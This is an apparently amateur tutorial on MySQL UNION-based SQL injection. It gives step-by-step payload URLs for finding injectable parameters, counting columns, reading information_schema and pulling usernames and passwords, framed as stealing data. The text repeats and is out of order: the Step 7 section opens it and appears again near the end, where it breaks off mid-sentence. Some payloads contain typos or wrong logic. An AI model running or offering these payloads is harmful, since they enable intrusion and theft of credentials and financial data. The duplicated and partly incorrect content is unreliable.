http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' --
Now say you dont like this first column/table, and you want to see if theres a second. There are two ways we can do this. The first is with limit (which i explained in the basic info section). So you would add limit 0,1 at the end which saying get 1 result starting from the 0th (first for humans, 0 for computers) result.
Then after you get the column/table, to move on you would do limit 1,1 then limit 2,1 etc until it runs out of columns. Heres an example:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --
then record the column and table its in. Lets say the columns userpass and table members. Then we’d change it to:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1 --
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1
then record the info again then. Then we change it to:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --
etc, until you run out of columns that are like pass.
Now say you didnt want to use limit. You could also use NOT IN(). For example, say you did
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%'
and you got the column user_password and table members. Now you wanted to see if there was an admins table with a column like pass. So you would add to the end
AND column_name NOT IN ('value'). This says choose the first row where the column "column_name" doesnt have this value. So if you wanted to get the next user column, you would do
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND column_name NOT IN ('user_password') --
or to be more safe, incase the admins table also has the column user_password, you could make it check for the table name like:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password') --
Then say you got the column password and table backup_members. This is only a backup table, so you want to keep on going until you get the admins table. then you would take the url from before and add a ,'backup_members' to the NOT IN ('user_password') like this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --
and then you would check the table name like this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE table_name LIKE '%pass%' AND table_name NOT IN ('user_password', 'backup_members') --
You would continue adding ,'table_name' until you finally got to the admins table (if there is one!)
Keep in mind magic quotes must be off for this. Again, you will found out how to bypass magic quotes in times like this later.
Now lets say the mysql version was only 4 and information_schema IS NOT present. So we would have to use another method to try to get the tables/columns of our interest. Basically, you would first look in the errors and see if it discloses the whole query or atleast the table and column (etc Mysql Error in 'userpass FROM users where id=1''), and the then resort to good old guessing. These two steps mainly revolve around luck and poor error message configuration.
So let me explain the error method first. Lets say you do this:
http://site.com/script.php?id=1'
and get the error:
MySQL Syntax Error in the query 'SELECT name FROM sb_news WHERE id = 1''
In the above example, the tables have a prefix (sb). Prefixes are usually present in each table if their in one and are very common in sites. Now that you know the prefix, you would guess sb_users, sb_members, sb_admins, sb_accounts, etc. You see that the column has no prefix, so after you get the table you would try username, password, user_password, user_pass, login, etc... If the error was
MySQL Syntax Error in the query 'SELECT name FROM news WHERE id = 1''
Then you would know the columns have no prefix and you wouldnt have to guess with the prefix. However errors like this are very uncommon. A more common error would be:
Mysql Error: Syntax error by '1' AND g_embedable=1 LIMIT 1' at line 1
This would show you the column name in the particular table. This would be useful because you can now assume either all the columns in the database have the g_ prefix, or you could somehow figure out why it has the prefix (for example, if it was a page of games, you could guess that g stood for games), then see how you can modify it for the users table (so if the table was users, it could be u_password, u_pass, u_username, u_user, u_login, etc). Of course, you would have to straight out guess the tables and if they had prefixes.
But once you have this info, how exactly do you check if the table/column exists? You would use a union all select that selected null (nothing) from the table youre guessing. For example:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null FROM table (remember to use the right number of columns)
Now if you get an error saying Mysql Error: Table 'table' Not found in script.php on line 7 or any error similar, you know the table doesnt exist.
Once you have guessed the table correctly, then you would have to guess the column. You would do this by changing a null to the column name you guessing and seeing if there was an error. For example:
http://site.com/script.php?id=1' UNION ALL SELCT null,null,password from users
If there is no error and the page loads, then you know the column is password. If there is an error saying invalid column, you have to keep guessing. Remember to use a column that does NOT cause a conversion error since the error may be misleading.
Now that you have the column and table you want to steal data from, well move on to the next step!:
Subsection 2.9 - Step 8)Get your data
This is the final part of this tutorial, and easy as hell!
So we have our table and column. Lets say the table is users and the two columns you got are username and password. So all we have to do to get the data from those columns is use a simple select query in our url and limit to sift through the rows! So with username and password in table users, we would do this:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,username FROM users --
Then check the page where the data is displayed and youll see the username!
Now for the password:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,password FROM users --
Then check the page where the username was and you’ll see the password! Now, instead of doing two separate queries for the username and password, there are two ways to get the data out at the same time.
The first is if two columns display data to the page. Say columns 2 and 3 displayed data in our UNION ALL SELECT null,null,null. So we would do
http://site.com/script.php?id=1' UNION ALL SELECT null,username,password FROM users --
Then you can look on the page for the username AND password. But they are on different parts of the page, arent they? To get them together, we can use the function concat(). Concat joins strings. the syntax is concat(string1,string2,etc). You can put in as many strings as you want separated by commas. You can either use column_names or actual strings enclosed by 's (magic quotes must be off). The benefit is the data is together and we only need one column that outputs.
So we can do this:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,password) FROM users --
But then there would be no distinction between the username and password. So we should add an --- between them. So we could do concat(username,'---',password). Again, magic quotes MUST be off for this to work. An example would be:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,concat(username,'---',password) --
Then you will see the username and password separated by ---'s on the page!
Now, what if you didn’t want the first users password? Then you would use limit as I discussed earlier. You would tell limit to start from the 2nd row (which is actually 1 for computers since 0 is the first) and to choose 1 row (limit 1,1). So you would do
http://site.com/script.php?id=1’ UNION ALL SEELCT null,null,concat(username, ‘---‘, password) limit 1,1 –
Then you would check the page again and in the place you saw the previous username and password you would see the second users in the same exact format. Now if you wanted the next user, you would change limit 1,1 to limit 2,1, then the next would be limit 3,1, etc etc until you have all the users you want!
And that concludes part I of my tutorial! Hope you liked it!
Sql Injection is one of the most common web application errors today. It is also one of the most deadliest because it allows remote users to access confidential information such as usernames and credit cards. With databases being the central core of our economy and all of our nations wealth being held in servers that may be able to be compromised by witty hackers, SQL Injection is a problem that needs to be addresses not to let hackers exploit these errors for their own good,pleasure, or challenge but rather to bring awareness to the fact that a simple error caused by a lazy or inexperienced programmer can cause consequences from a simple website deface to the leaking of millions of users financial information. To start this paper out, I provide you with an Outline for MySQL Injection attacks, which will also serve as a table of contents since each section will discuss a separate step in the exploitation process.
MySQL Injection Outline (table of contents):
In Part 1 (this part):
Section 1 - Intro to Basic Database Information
Section 2 – Steps to injections
1)Find out how to close the previous statement & find the right comment to use to end the injection
2)Check for magic quotes
3)Check to see if UNION works
4)Find the number of columns
5)Craft a union statement that doesnt cause an error and see which columns are outputted
6)Check the mysql version to see if information_schema is present
7)Get the desired column and table names
8)Get your data
In Part 2: (not done yet)
Section 1 – Advanced injections
1)Check for load_file()
2)Check for into outfile
3)Ddos the mysql server
4)login page injections
5)Possible failures - multi selects
6)Get past magic quotes - where, concat - no load_file
7)The no spaces bug
8)Getting past filters
9)Blind Injection
10)Advanced NOT IN
Before we start anything about inserting SQL commands and stealing data from columns and tables, we need to discuss the basics and all the terms that will be necessary for fully comprehending this paper. So lets begin this with some basic Database Server Info. By the end of this section you should fully understand the basics of databases and how they function on a user interaction level.
Section 1: Basic Database Information
Database(DB) Servers are servers that hold information. Information is stored in a type of holder called database, which is a certain section of the database that serves as a structured container that stores data in fully organized subsections which enable the quick and efficient withdrawal or insertion of data..
DB Servers can have many databases, each with a different use, such as web, which may hold content displayed or needed for the correct display of webpages open to the public, or intranet, which may include information needed by employees on the inside network of the company, etc. There are many types of database servers, but all are similar which few differences. Some common types are:
1)Mysql
2)MsSQL (Microsoft SQL Server)
3)Oracle
4)Microsoft Access
5)Postgre SQL
etc..
In this tutorial we will discuess one of the two most common, MySql (the other most common is MsSQL, then after that Microsoft Access).
DB's are made up of tables, each which hold a similar type of data such as user info or articles.Tables are made up of columns, which group the data into different types such as usernames, passwords, dates registered, etc.The actual data in a table is in a row, which are inserted into the database and have info for each column in the table - e.g. a username, password, etc
To help visualize visual of a database server would look like this:
Now, to access data from the server you would use SQL - Standard Query Language. This is similar to programming languages in that it has its own set of functions, operators, and syntax. This lets you select certain data that you want and choose the database, table, and columns that you want to access the rows in.
SQL has a set format for selecting data from the database. It looks like this:
SELECT column1,column2 FROM table
This is basically saying to go to table “table” and gets the data stored in columns “column1” and “column2” for all the rows (since the number is not specified, it takes them all. Ill show you how to specify how many next) .
But what if you only wanted two rows? Yes, you could still retrieve all the rows then sort it out with commands in php, but that’s inneficient. Say you wanted the FIRST 2 usernames & passwords from table users of database webinfo (for injections you usually dont have to put the database, its already selected in the code)You would use
Select column_name FROM table_name limit start,number
column_name is the columns you want. if you want two columns, you would do column1,column2.
table_name is the table. If you want to use a table from a different datbase server, you would do database.table
limit start,number tells the server how many rows you want. Say you want the first 2 rows, you would make start 0 (the first row), and put number 2 for two rows. This would basically say go to the first row (0) and give me the next two rows.
If you wanted the next 2 rows after the first two (but only two, not all 4), you would make start 2 since you already got 2 and make number 2 again. (limit 2,2). This would be saying go to the second row and get me the next two rows. If you wanted all four, youwould make start 0 and number 4.
For injections you dont need to know how to get the data out of the query result in php/asp, which usually involve manipulating the arrays returned by the mysql query, since its already done for you in the code of the script youre trying to hack. You just need to find which columns get displayed to the page, which we will discuss later.
Now, say you want to get the password of a user whose username is "bako123". This is used for login systems to check logins. Then you would use:
Select column_name FROM table_name WHERE column_name = 'Value'
For example, if you wanted to the password column from the table users in a row where the username column is bako123 you would do:
Select password FROM users WHERE username = 'bako123'
This would let you retrieve the password of a certain user, bako123. This can be used in many ways, to retrieve a certain article, user information, a certain persons financial information, etc.
If you wanted to get the password of a user where the name was similar to bako, maybe xbako or bakos or xbakos, you would do
Select password FROM users WHERE username LIKE '%bako%'
The % is a wildchar which basically says there can be text in its place, so in this case there can be text before and after bako since there is a % before and after it.
This leads us to the final discussion in this section: Magic Quotes.
Many database servers (or scripts that access them) have magic quotes enabled. This takes quotes like ', which are needed to specify data like for statements like WHERE username = or in functions we will discuss later that load files with a certain filename. Quotes are needed to specify strings. For example, when we did WHERE username LIKE ‘%bako%’, the quotes told the server that the string to search for was %bako%. If there were no quotes, the server wouldn’t take %bako% as a string, and not only would the search fail but the script would return an error because %bako% is out of place.
Magic Quotes prevents quotes from being used in injections by either making the ' (original quote) to \' (backslashed quote) or '' (double quote).
The \' tells the sql server to take away the meaning of the ' and regard it as a normal character in a string. For example, say you wanted to select a password from a user that had a username Bako's. If you did :
Select password FROM users WHERE username = 'bako's'
the ' in bako's would end the username = value statement and make it WHERE username = 'bako'. Then the s' would be stray and cause an error.
So to sepcify that the ' isnt part of the SQL query syntax but just a normal character in a string like the letter b, you can use \ to take its meaning away and make it be considered a normal character by the server.
Another way the server takes the meaning away from ' is by making it ''. Say you wanted to find a user by the name of bako's again, and you put bako's straight into the script, like
Select password FROM users WHERE username = 'bako's'
the script/server would change it to
Select password FROM users WHERE username = 'bako''s'
which would then create two different strings, bako and s, and since the s is out of place and not in a statment( like SELECT col FROM table WHERE col = value) or function it would cause an error too. There is a way to get around this in certain cases, and it will be discussed later. Now that you know basic info on mysql, time to start Injecting!!
Section 2: SQL Injecting to Steal Data
In this section we will cover each of the steps to succesfully exploiting SQL Injection vulnerabilities in web scripts that use mysql. We will go step by step and cover each part thoroughly. By the time you finished this section you should fully understand how to take advantage of SQL Injection vulnerabilities and be able to succesfully retrieve data such as usernames, passwords, financial information, and other assorted confidential data from databases that are used by vulnerable scripts. Well start from the very beginning of determining if the script is vulnerable or not.
Subsection 2.1: Check for Injections
So say you find a script like this and you want to see if its vulnerable to SQL Injection:
http://site.com/script.php?id=1
In order to further demonstrate how this works, lets say you do know what query the script forms (which is usually very unlikely in real-world injections). Lets say it looks like this:
Select title,data FROM news WHERE id =
What that would do is get the title and data info from the news table in a row where the column id was 1.
So, what if we added some sql commands to the id in the url? Like this:
http://site.com/script.php?id=1'
The output depends on the script’s quality. If the script filters the input for sql keywords, or converts the id value to an integer so the keywords don’t get through, or takes any other precaution to ensure that you cant insert sql statements into the query, then no sql error would be returned, and the page will either load normally or give you a warning like “Attack Spotted, Your IP Address has been recorded “ or something similar. However, if the script had no filtering whatsoever and just got the user data for id straight from the URL and inserted it right into the MySQL Query, then you would get an error like this:
"MySQL Syntax Error By '1'' In file script.php On Line 7."
Then you would know that the server does NOT filter input to make sure there are no sql commands/syntax in it and DOES NOT make sure the data is only an integer. Since you got an error, you are SURE that this is SQL Injectable!
Keep in mind that now all sites has errors as verbose as this, some sites have simple errors like “INTERNAL ERROR” or “ERROR” that reveal no useful data. However, you can be reasonably sure that its injectable. To be fully sure, move on to the next step. If all the possibilities fail in the next step, then you now chances are that’s not an sql error but some other type of error.
Now That you have found out its injectable, lets go step by step through my MySQL Injection outline.
Subsection 2.2 - Step 1)Find out how to close the previous statement.
To do this we will use an SQL operator "and". This word lets you specify two criterias that the row must match when searching the table. For example, if you have a WHERE clause, such as
Select user from users where password = 'pass123'
and want to select data not only where the password is 'pass123' but also where the email is 'email@m.com', you would use somethings like this:
Select user from users where password = 'pass123' AND email = 'email@m.com'
This basically tells the server, as we had before, select the data from the user column in a row in table users where the password is pass123 AND the email also is email@m.com. If both of these criteria are not matched, then the script moves on to the next row.
Another operator like AND is OR. An example:
Select user from users where password = ‘pass123’ OR email = ‘email@m.com’
This basically says, instead of making sure the column password is pass123 AND the email is email@m.com, it searches for rows where the password is pass123 or the email is email@m.com. Both don’t have to be present for the row to be chosen. One will do, even if the other doesn’t equal the right value.
Now say you added an and 1=1 to any statment, it would load since 1 always equals 1. This can be very useful from an attackers point of view. It can help us find out how to close the previous query AND can help us to determine is magic quotes are enabled.
Lets say you dont know the query, as you wont in most cases. The query could be anything like:
Select user from users where id = '1'
or
Select user from users where id = (1)
or
Select user from users where id = 1
etc...
In order to add more SQL commands to steal our data (credit cards, usernames, passwords, etc)we need to be able to end the where id = 1 (or '1', (1), etc). To do that we would have to try different possibilities until we get NO error.
In order to add our command, we would also need to know how to get rid of the other data that will come after our injection. For example, if the query was like this:
Select user from users where id = '1'
and we did http://site.com/script.php?id=1' and 1=1 (lets say magic quotes are OFF)
the query would become
Select user from users where id = '1' or 1=1 '
The stray ' after 1=1, which is left over from the '1' before we added our commands, needs to be taken care of or it will cause an error. To do this, we need to use comments to comment out the rest of the code. Two comment operators are /* and --. Sometimes one will cause an error, in that case try the other.
So lets have an full example for this first step in injections.
Say the script was, as i said before:
http://site.com/script.php?id=1
First we would check if its injectable:
http://site.com/script.php?id=1'
It gives - "Error in MySQL Syntax by '1'' in script.php on line 7."
Now you know its injectable. Now lets try to see how to end the WHERE clause.
http://site.com/script.php?id=1 or 1=1 --
This would work if there was no ' surrounded 1, like in
SELECT title FROM news where id = 1
This gives the error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."
Remember, MySQL always surrounds the problem part in the query, in this case 1’ or 1=1 --, with quotes, so don’t let the beginning and end quotes confuse you.
Even though the error shows you that 1 has a ' after it (by '1' or 1=1 --') we will pretend we didnt notice (not all sites have errors like this anyway).
So we would try next
http://site.com/script.php?id=1 or 1=1 /*
same error - "Error in MySQL Syntax by '1' or 1=1 --' in script.php on line 7."
Now lets try ending it with '. so lets do:
http://site.com/script.php?id=1' or 1=1 /*
now we get the error - "Error in MySQL Syntax by '/*'. in script.php on line 7."
This would show us that either /* isnt supported or this sql server is configured so that it needs a */ to close the comment, which would defeat the purpose of commenting out the code. But since it doesnt give us an error about the ' after id=1, we know were close. So we try the next comment opertaor:
http://site.com/script.php?id=1' or 1=1 --
The page loads normally!!! Now we know we need to end the where clause with ' and add -- to the end to add our sql commands!!
Now we move on to the next step:
Subsection 2.3 - Step 2)Check for magic quotes
We know from our example before that magic quotes are off because we used ' to end the WHERE clause and it gave no error, but lets pretend our first try worked, http://site.com/script.php?id=1 or 1=1 --, so were not sure if ‘ causes an error or not. We need to know if magic quotes is on because if we want to use a function like load_file to steal files (discussed later), or choose data where the user = 'admin', we need to be able to use 's, so magic quotes MUST be off.
To find out if theyre on, we would try:
http://site.com/script.php?id=1 or '1'='1' --
If you get an error like:
"Error in MySQL Syntax by '\'1\'=\'1\''. in script.php on line 7."
or
"Error in MySQL Syntax by '''1''=''1'''. in script.php on line 7."
then you would see that magic quotes are on since its adding \s or an extra ' to the ' you put in. Then you would not be able to steal files if load_file was enabled or choose certain data using WHERE ( there is a way to get around it which I will discuss later, but it doesnt work for load_file, just WHERE and other functions discussed later like concat)
Now if you get no error, you know magic_quotes are off and you have an even bigger advantage. That was easy, wasn’t it? Now lets move on.
Subsection 2.4 - Step 3)Check to see if UNION works
UNION is a function in sql that lets us select more data in a single sql statement. This can be very useful since we need to use it in order to select our own data that we want to steal from the database such as passwords or financial data. To illustrate its use further, heres an example. Say the query was:
SELECT user from users where pass = 'pass'
we could do
SELECT user from users where pass = 'pass' UNION select email from emails limit 0,1
And no error would be displayed. You don’t need to know how it helps get data to the page etc since its not needed to get the injection working.
However, in order to get the data from the UNION SELECT displayed, we would need to make sure the first select statement displays no data at all.If the first select statement does return data, it will overwrite the data from the UNION. We will discuss this later. Also, it is always good to use UNION ALL instead of just UNION, it can prevent type mismatch errors.
Now, UNION is only availabe in mysql server versions above 3 (4,5,6 - 6 is the latest, but 5 is most popular). So in order to steal our data, we need to use union (well, we could use blind injection, but thats a pain in the ass), and in order to use union, the mysql version MUST be > 3.
There is a way to check for the mysql version without union ( 1 and (substr(@@version, 1)>3 )- but its more advanced than the general tone of this tutorial at the moment (ill go over it in a bit), so we will use an easier way. This is to try a union select and judge the error. So we could try:
http://site.com/script.php?id=1' UNION ALL SELECT 1 --
If you get an error like :
"Error in MySQL Syntax by 'UNION'. in script.php on line 7."
Then you know that the server is not understanding what UNION is since its getting an error at the UNION keyword. If you got an error like:
"MySQL Error: Select statements must have the same number of columns in script.php on line 7."
Then you know union worked since it realizes that both selects don’t have the same number of columns, therefore showing that it reads two selects, where ones the original and one our union. Even If we got a different error such as a type conversion, as long as its not saying an error by UNION its ok. For some errors that just show “INTERNAL ERROR” or something similar, it’s a good idea to try the next method.
So, if there arent error messages like this, and just errors like INTERNAL ERROR, then you can use
http://site.com/script.php?id=1' and substr(@@version,1)>3 --
Substr is a function that takes a certain character from a string. @@version gives us the mysql version in a string. So say @@version returned 4.1.33-log, subtr would get the 1st letter in it (the ,1 in substr(@@version,1)), which is 4. Then it checks if 4 is greater than 3 (the >3 part). If it is, the page loads normally. If it doesnt, the page will load with no data (you can get a blank page, or a page with the basic template but no actual data, e.g. no title for the news and no actual news).
Now if UNION works, were in business! Time to move on! if not, you can use blind injection, which will be briefly discussed later in Part 2.
Subsection 2.5 - Step 4)Find the number of columns
This section will fix this error we got before- "MySQL Error: Select statements must have the same number of columns in script.php on line 7.". In order to actually use UNION to steal data, we must make union work first with no error at all so the page can load and display the stolen data.
This error occured because the initial SELECT statement and the UNION ALL SELECT statement we injected had a different number of columns.Whenever you have UNION SELECT (or UNION ALL SELECT), the number of columns must ALWAYS match the number of columns in the first SELECT statement, or you’ll get an error. For example, if the query looked like this:
Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email FROM emails
You will get that error since the first select is selecting two columns (user and pass) while the UNION ALL SELECT is selecting only one (email). So if you did
Select user,pass FROM users WHERE userid = 1 UNION ALL SELECT email,id FROM emails
There wouldnt be an error and the query would execute succesfully since the first select statement is selecting two columns (user and pass) and the second select, the union all select, is also selecting two columns (email and id).
Now to get the number of columns in the first select statment, we can do two things:
1) guess the number of columns till you get it right. For example
http://site.com/script.php?id=1' UNION ALL SELECT null --
(null is a data type that means empty. If you used 1 or 'the' - or in other words, an integer or string, you might get a type mismatch error)
If you get an error like "MySQL Error: Select statements must have the same number of columns in script.php on line 7." then you move on to
http://site.com/script.php?id=1' UNION ALL SELECT null,null --
and continue adding a ,null (an extra column) to the URL until you get no error. Then count the nulls and thats the number of columns!
2) use order by - this is WAY easier.
ORDER BY is a statement in SQL that tells the database server how to order the result. For example, if you did
SELECT title,data FROM news WHERE id=1 ORDER BY news ASC
the server would order the all the output in alphabetical order from a-z. If you changed ASC to DESC it would make it z-a.
The server automatically sees if the column is a string or integer. if its a string, it goes alphabetically, and if its an integer, numerically.
ORDER BY also selects numbers instead of columns. The number is the number of the column in the select statement. For example, if the query waas this:
SELECT title,data FROM news WHERE id=1 ORDER BY 1 ASC
It would choose the first column chosen in the query, which is title (it chooses from title, data). Then it orders the result alphabetically from a-z.
If it was
SELECT title,data FROM news WHERE id=1 ORDER BY 2 ASC
It would use the second column selected, data, and order it by that.
So we can take advantage of this and try numbers from 1 on in the URL. Once we hit an error saying that the column is invalid, we know that the last number to NOT give an error is the number of columns. Heres an example:
http://site.com/script.php?id=1' ORDER BY 1 -- no error
http://site.com/script.php?id=1' ORDER BY 2 -- no error
http://site.com/script.php?id=1' ORDER BY 3 -- no error
http://site.com/script.php?id=1' ORDER BY 4 -- error - "MySQL Error: No column number '4' in WHERE clause in script.php on line 7."
So we know that 3, the last number to not give an error, is the number of columns in the first select!
Now lets move on to the next step!
Subsection 2.6 - 5)Craft a union statement that doesnt cause an error & see which columns are outputted
So now that we know the number of columns, we need to make a union statement and see which columns are outputted to the site so we know which columns we can use to retrieve and output our data to the screen. This is generally a two step process.
1)First we craft the union select statement( rememer to use union all) which numbers as the columns. An example:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,3 --
If there is no error, you look at the screen and check which numbers are displayed in the place data would normally be put (for example, in the place where the article title would be, check if a number is there).
If the numbers are on the screen, you know you can use the columns with those numbers to display stolen data. The other columns that arent displayed are useless.
For example, if you see the number 2 in the title of the page and a number 3 where the article is usually displayed, you know that you can use the second and third column (where you put the 2 and 3 in the union all select 1,2,3 --) to display data you will steal from the database to the page.
Now if you get an error when you use all numbers like: "MySQL Error: Cant convert int in script.php on line 7." then you know that one column cant be a number, so you should move to step 2.
2)Since we know that we cant go all out and put all integers, we need to use null. Null never causes a type conversion error since its just an empty data holder. So we try:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --
Now if you can an error, there is a good chance the script has TWO select statements. For example, first it can do
SELECT title,data,author FROM news WHERE id= '[your data from the url]'
then in a later line in the script it uses the id value from the url again in another select statement like this:
SELECT data,time FROM news WHERE id= '[your data from the url]'
Now, the first select statment would be like this:
SELECT title,data,author FROM news WHERE id= '1' UNION ALL SELECT null,null,null --
but the second will be
SELECT date,time FROM news WHERE id = '1' UNION ALL SELECT null,null,null --
This would cause an error since the second query has ONLY TWO columns in the first select statement (time,year), while the union all select has THREE columns. This will cause another error saying select statement need the same number of columns. Now if you change the UNION ALL SELECT to have two nulls, then the first select would cause an error.
Unfortunately, there is no way around this in mysql at the moment. (in mssql there is, however). A good way to double check that its a multi select and not that you messed up the number of columns in the UNION select statement is to cause an error like we did before, doing
http://site.com/script.php?id=1'
Say you got an error like this:
"MySQL Syntax Error By '1'' In file script.php On Line 7."
Then do the union all select url like this:
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --
say you get an error like this:
"MySQL Error: Select statements must have the same number of columns in script.php on line 18."
Now look at the two errors. The first is on line 7, and the second on line 18. Now that you know that two separate lines of code caused the error, you know that two separate queries caused the error and it is infact a multi select, which you cant get around.
Keep in mind that not all sites have errors that verbose. Some just say "error". Then you would have to double check the columns and make sure you didnt make a mistake.
So lets say there is no multi select. We left off at :
http://site.com/script.php?id=1' UNION ALL SELECT null,null,null --
Now there is no error. So we try this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,null,null --
We check for two things: an error, and if no error is displayed, check if the number 1 is displayed on the page in a place it wasnt before, like the title or where the news or author would be.
Say you get the same error as before in step 1:
"MySQL Error: Cant convert int in script.php on line 7."
Then you know that the first column causes an error, and you should ignore it and switch it back to null.
If it happens that all the columns cause errors or arent displayed on the page, you can come back and test it with 'test' instead of 1 and see if it displays text or still gives a conversion error. If you get no error AND the word test is displayed on the page, you can then go further and get usernames/passwords and any other text based data, but not data that are integers like dates and credit cards.
So now that we know 1 causes an error, we move on and check column two after we switch 1 back to null.
http://site.com/script.php?id=1' UNION ALL SELECT null,2,null --
Now look at the screen. Lets say there is an error. So now we know that 2 also causes an error and cant be used.
So lets change 2 back to null and try 3.
http://site.com/script.php?id=1' UNION ALL SELECT null,null,3 --
and guess what - no error! now check the page for the number 3. Check any places such as the title bar in your browser and places where data was like where the news was orthe author or date. If you dont find anything, dont give up, make the number unique like 1232323132 and view the source and see if its displayed in any hidden tags.
If its not displayed, as i said before, you can go back to the other two and try strings like 'test' (as long as magic quotes are disabled, or your getting around them like i will explain later), and check if those are displayed.
So now we are left with:
http://site.com/script.php?id=1’ UNION ALL SELECT null,null,3 –
and we know we can use the 3rd column to display our stolen data! So lets move on to step 6:
Subsection 2.7 - Step 6)Check the mysql version to see if information_schema is present
This is an easy step!
Information_Schema is a part of the database that holds ALL of the table names and column names stored in that database. You can access it like any other table.
To get tables, you would use information_schema.tables like this:
select table_name from information_schema.tables
This would return all of the tables that exist in the database.
To get columns you would use information_schema.columns
select column_name from information_schema.columns
This would return all the column names in all the tables of the database.
Information_schema.columns also holds the table names, so you can switch column_name with table_name and use it to get tables too.
Now this luxury is only available in mysql version 5 and up (6). So to make sure we can use it, we need to use the @@version command to check the version. So lets take our url and change 3 with @@version.
http://site.com/script.php?id=1' UNION ALL SELECT null,null,@@version --
Now, check where the 3 was before to see the version.
If the version is like 4.0.22-log, then the mysql version is 4 and you cant use information_schema.tables, but if its 5.0.1, then you can use information_schema.tables! You can also use the substring method I described before.
Now lets move on to step 7:
Subsection 2.8 – Step 7) Retrieve the desired columns
If the version is aboveor equal to 5, we can scan information_schema for password (or credit card, etc) columns. If not, we have to guess and use clues given to us in errors to find prefixes, tables and columns that we want to steal data from. So for the first part lets assume that information_schema is enabled.
Now we need to scan information_schema for columns that are similar to pass, password, user_pass, etc. ( you can change it around so it will be creditcard, address, phone number, etc)
So, we need to use information_schema.columns and the LIKE operator along with wildchars (%) as i discussed in the basic info section.
So if we were putting queries straight into the db server, it would look like this:
SELECT column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'
(of course, magic quotes will have to be off. If they're on, you will learn how to get past them later on)
For our vulnerable site, it would look like this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' –
The LIKE ‘%pass%’ is telling the server to scan make sure column_name has a value that is similar to “pass” and can have text before and after it (the wildchars). So it could be pass, userpass, password, etc.
This will return the first column_name that is like pass, with text before and after it (from the wildchars before and after it).
Now say you want the table_name the columns in so you can access it with union. You would simply change column_name to table_name like this:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' --
Now say you dont like this first column/table, and you want to see if theres a second. There are two ways we can do this. The first is with limit (which i explained in the basic info section). So you would add limit 0,1 at the end which saying get 1 result starting from the 0th (first for humans, 0 for computers) result.
Then after you get the column/table, to move on you would do limit 1,1 then limit 2,1 etc until it runs out of columns. Heres an example:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 0,1 --
then record the column and table its in. Lets say the columns userpass and table members. Then we’d change it to:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1 --
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 1,1
then record the info again then. Then we change it to:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%' limit 2,1 --
etc, until you run out of columns that are like pass.
Now say you didnt want to use limit. You could also use NOT IN(). For example, say you did
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%'
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,table_name FROM information_schema.tables WHERE column_name LIKE '%pass%'
and you got the column user_password and table members. Now you wanted to see if there was an admins table with a column like pass. So you would add to the end
AND column_name NOT IN ('value'). This says choose the first row where the column "column_name" doesnt have this value. So if you wanted to get the next user column, you would do
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND column_name NOT IN ('user_password') --
or to be more safe, incase the admins table also has the column user_password, you could make it check for the table name like:
http://site.com/script.php?id=1' UNION ALL SELECT 1,2,column_name FROM information_schema.tables WHERE column_name LIKE '%pass%' AND table_name NOT IN ('user_password') --
Then say you got the column password and table backup_members. This is only a backup table, so you want to keep on going until you get the admins table. then you would take the url from before and add a ,'backup_members' to the NOT IN ('user_password') like this:
